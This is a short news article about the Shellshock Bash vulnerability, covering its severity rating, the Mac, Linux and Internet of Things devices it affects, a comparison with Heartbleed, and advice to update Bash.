Shellshock Vulnerability: A Bigger Threat Than Heartbleed
The security community is scrambling to patch a newly discovered vulnerability in the Bash shell. Known as Shellshock or the Bash bug, the vulnerability enables an attacker to worm past firewalls and through a computer system by adding malicious code to environment variable assignments in Bash. Environment variables affect the way a process runs on a computer, so with the vulnerability, hackers can use them to run malicious code as soon as the shell is launched.
Any software that uses a Bash shell could be susceptible, including Mac and Linux operating systems. Security experts are especially concerned because Bash shells have become the standard for new Internet of Things devices, so the vulnerability could extend to increasingly ubiquitous “smart” objects like thermostats and baby monitors.
Shellshock was given a severity rating of 10 out of 10 by the U.S. National Vulnerability Database. Robert Graham of Errata Security disagrees: “On the scale of 1 to 10, this is an 11,” he told CNET.
One reason Shellshock is especially dangerous is because it “interacts with other software in unexpected ways,” Graham says. Bash works with numerous other programs, making it extremely challenging for IT professionals to identity and patch all the software affected by the vulnerability. This means Shellshock, like Heartbleed, will inflict long-term damage – hackers will continue to exploit it for years. (For reference, Heartbleed was discovered in April 2014 and Venafi Labs reports that 97% of Global 2000 organizations remain vulnerable to it.)
Released in 1989, Bash is getting old by software standards. Some security researchers believe the vulnerability has been present for around 20 years.
Mac users can take action by updating Bash right away. A post on Stack Overflow suggests a simple test to see if your Mac is vulnerable to the bug and how to update Bash. Software companies like Red Hat, Inc. are working on a patch for Linux systems. For now, they suggest mitigating your risk with a workaround detailed on their blog. Shellshock is a major threat, but most of the risk is long-term rather than immediate.
